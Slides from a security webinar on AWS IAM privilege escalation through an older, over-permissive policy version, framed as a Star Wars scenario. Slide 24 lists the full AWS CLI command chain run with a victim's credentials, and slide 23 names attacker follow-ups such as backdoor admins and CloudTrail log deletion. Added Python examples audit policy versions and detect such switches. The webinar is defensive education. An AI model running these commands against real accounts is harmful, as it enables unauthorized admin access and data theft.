
IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)

Slides from a webinar conducted on Star Wars Day, 2021.

The webinar was focused on a demo of a misconfigured AWS IAM policy that allows a user to gain administrative privileges within AWS.



May 06, 2021


  1. IAM Bad Privilege Escalation using Misconfigured Policies in AWS IAM

    Riyaz Walikar | Co-Founder - Kloudle | riyaz@kloudle.com May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)
  2. Riyaz Walikar, Co-founder & Chief Breaker of Things @ Kloudle Inc.

    Twitter: @riyazwalikar, Blog: https://ibreak.software
    • Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently container and Kubernetes
    • Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle
    • Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺)
    • Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny
  3. https://starwarsblog.starwars.com/wp-content/uploads/2021/04/disneyplus-star-wars-day-fan-art-takeover-7387930_TALL.jpg

  4. What is the webinar about?

    • What is an AWS IAM policy?
    • Common examples of a misconfigured or overly permissive policy
    • Demo of a misconfiguration within a policy that leads to privilege escalation
    • Q&A
  5. What is an AWS IAM Policy?

    • A policy is an object in AWS that, when associated with an identity or resource, defines their permissions.
    • AWS evaluates these policies when an IAM principal (user or role) makes a request.
    • Permissions in the policies determine whether the request is allowed or denied.
  6. An Example AWS IAM Policy

  7. Some examples of policy misconfigurations / permissive configurations

  8. Common misconfigurations with Policies

    • Usage of wildcard * not bound to Action or Resource
  9. Common misconfigurations with Policies

    • Usage of an “Action” that could lead to impersonation of another user
  10. Common misconfigurations with Policies

    • Multiple policy versions with an overly permissive configuration in an older version
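The three misconfigurations above can be checked offline from the output of the get-policy / get-policy-version calls. The following audit script is an added example, not code from the webinar or from Kloudle; the policy versions in SAMPLE_VERSIONS are constructed, and the audit flags any non-default version that grants actions the current default does not (the situation the demo exploits) as well as whether the default version itself grants iam:SetDefaultPolicyVersion.

```python
import fnmatch

# Constructed sample (not from the webinar): the decoded "Document" of each version of
# one customer-managed policy as "aws iam get-policy-version" returns it, plus the default.
SAMPLE_VERSIONS = {
    "v1": {"IsDefaultVersion": False, "Document": {"Statement": [
        {"Effect": "Allow", "Action": "iam:ListPolicyVersions", "Resource": "*"}]}},
    "v5": {"IsDefaultVersion": False, "Document": {"Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    "v6": {"IsDefaultVersion": True, "Document": {"Statement": [
        {"Effect": "Allow", "Resource": "*", "Action": [
            "iam:GetPolicy", "iam:GetPolicyVersion", "iam:ListPolicyVersions",
            "iam:ListAttachedUserPolicies", "iam:SetDefaultPolicyVersion"]}]}},
}

def _as_list(value):
    """Statement, Action and Resource may each be a string or a list."""
    return value if isinstance(value, list) else [] if value is None else [value]

def allowed_actions(document):
    """Lower-cased Action patterns granted by the Allow statements."""
    return {a.lower() for s in _as_list(document.get("Statement"))
            if s.get("Effect") == "Allow" for a in _as_list(s.get("Action"))}

def unbound_wildcards(document):
    """Allow statements with a bare '*' Action, or 'service:*' on Resource '*' (slide 8)."""
    hits = []
    for s in _as_list(document.get("Statement")):
        actions, resources = _as_list(s.get("Action")), _as_list(s.get("Resource"))
        wild = any(a == "*" or a.endswith(":*") for a in actions)
        if s.get("Effect") == "Allow" and ("*" in actions or (wild and "*" in resources)):
            hits.append(s)
    return hits

def _covered(action, patterns):
    return any(fnmatch.fnmatchcase(action, p) for p in patterns)

def audit_policy_versions(versions):
    """Non-default versions that grant actions the default does not (slides 10 and 21)."""
    default_id = next(v for v, m in versions.items() if m["IsDefaultVersion"])
    default_actions = allowed_actions(versions[default_id]["Document"])
    report = {"default": default_id, "risky_versions": {},
              "can_switch": _covered("iam:setdefaultpolicyversion", default_actions)}
    for vid, meta in versions.items():
        if vid == default_id:
            continue
        extra = sorted(a for a in allowed_actions(meta["Document"])
                       if not _covered(a, default_actions))
        if extra:
            report["risky_versions"][vid] = extra
    return report
```

Any policy where the report lists a risky version and can_switch is true should have its stale versions deleted and the iam:SetDefaultPolicyVersion permission removed from the principals it is attached to.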
  11. Demo: Multiple policy versions with an overly permissive configuration in an older version
  12. Demo Assumptions and Goal

    • Because we are demonstrating privilege escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials
    • These credentials appear to be non-privileged.
    • Our aim is to exploit a misconfiguration in the user’s policy definition and gain access to the employee database for the Death Star
  13. Identify who you are and if you have access

  14. List what user defined policies are attached to the user

  15. Get the policy’s current version number

  16. Get v6 policy json definition

  17. Get a list of available versions for the policy

  18. Get v1 definition of the policy

  19. Get v2 definition of the policy (and so on)

  20. Get v5 definition of the policy (and notice the privileges)

  21. Set v5 of the policy as the default policy

  22. Access Darth Vader’s Employee database

  23. Post privilege escalation?

    • With the kind of access you will get, explore what else is available within the AWS account
    • Attackers tend to focus on data theft/destruction and attempt to use resources for their own benefit (like crypto-mining) etc.
    • Some attackers create a shadow admin account and use it as a backdoor
    • To hide their traces within AWS, attackers may also remove AWS logs (CloudTrail, flow logs etc.).
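The version switch from slide 21 and the log removal mentioned above both leave CloudTrail management events behind. The detector below is an added example, not code from the webinar or from Kloudle; the CloudTrail records in SAMPLE_EVENTS, the account id, user name and policy ARN are all constructed placeholders, and the ATTACHED map stands in for the output of list-attached-user-policies collected ahead of time. It rates a SetDefaultPolicyVersion on a policy attached to the caller (self-escalation, as in the demo) higher than one on someone else's policy.

```python
# Constructed CloudTrail records (not from the webinar), reduced to the fields the
# detection reads; the account id, user name and trail name are placeholders.
POLICY_ARN = "arn:aws:iam::123456789012:policy/TarkinPolicy"
SAMPLE_EVENTS = [
    {"eventTime": "2021-05-04T15:01:12Z", "eventName": "ListPolicyVersions",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"policyArn": POLICY_ARN}},
    {"eventTime": "2021-05-04T15:02:40Z", "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v5"}},
    {"eventTime": "2021-05-04T15:09:03Z", "eventName": "StopLogging",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"name": "management-trail"}},
]
# Constructed: managed policies attached to each user, i.e. the output of
# "aws iam list-attached-user-policies" gathered before the events are reviewed.
ATTACHED = {"tarkin": {POLICY_ARN}}

# CloudTrail API calls that stop, narrow or delete a trail (slide 23: log removal).
LOG_TAMPERING = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}

def detect(events, attached):
    """Return alerts for policy-version switches and log tampering.

    A SetDefaultPolicyVersion on a policy attached to the caller is the
    self-escalation shown in the demo and is rated high; on someone else's
    policy it is still worth a look and is rated medium."""
    alerts = []
    for ev in events:
        name = ev.get("eventName")
        user = (ev.get("userIdentity") or {}).get("userName", "<unknown>")
        params = ev.get("requestParameters") or {}
        if name == "SetDefaultPolicyVersion":
            arn = params.get("policyArn", "")
            own = arn in attached.get(user, set())
            alerts.append({"time": ev.get("eventTime"), "user": user,
                           "severity": "high" if own else "medium",
                           "reason": f"{user} switched {arn} to {params.get('versionId')}"
                                     + (" on a policy attached to themselves" if own else "")})
        elif name in LOG_TAMPERING:
            alerts.append({"time": ev.get("eventTime"), "user": user, "severity": "high",
                           "reason": f"{user} called {name} on trail {params.get('name')}"})
    return alerts
```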
  24. Commands from the Demo

    aws rds describe-db-instances --profile <victim-profile-name>
    aws sts get-caller-identity --profile <victim-profile-name>
    aws iam list-attached-user-policies --user-name <victim-aws-user-name> --profile <victim-profile-name>
    aws iam get-policy --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name>
    aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v6 --profile <victim-profile-name>
    aws iam list-policy-versions --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name>
    aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v1 --profile <victim-profile-name>
    aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v2 --profile <victim-profile-name>
    aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v4 --profile <victim-profile-name>
    aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v5 --profile <victim-profile-name>
    aws iam set-default-policy-version --policy-arn "<arn-value-of-policy>" --version-id <version-with-excessive-privs> --profile <victim-profile-name>
    aws rds describe-db-instances --profile <victim-profile-name>
  25. Image credits

    • https://pngimg.com/uploads/stormtrooper/stormtrooper_PNG11.png
    • https://thenounproject.com/term/darth-vader/65913/
    • https://starwars.fandom.com/wiki/Wilhuff_Tarkin

  26. Q&A

    Site: https://kloudle.com
    Blog: https://kloudle.com/blog
    Twitter: @kloudleinc, @riyazwalikar
    Reach us at: riyaz@kloudle.com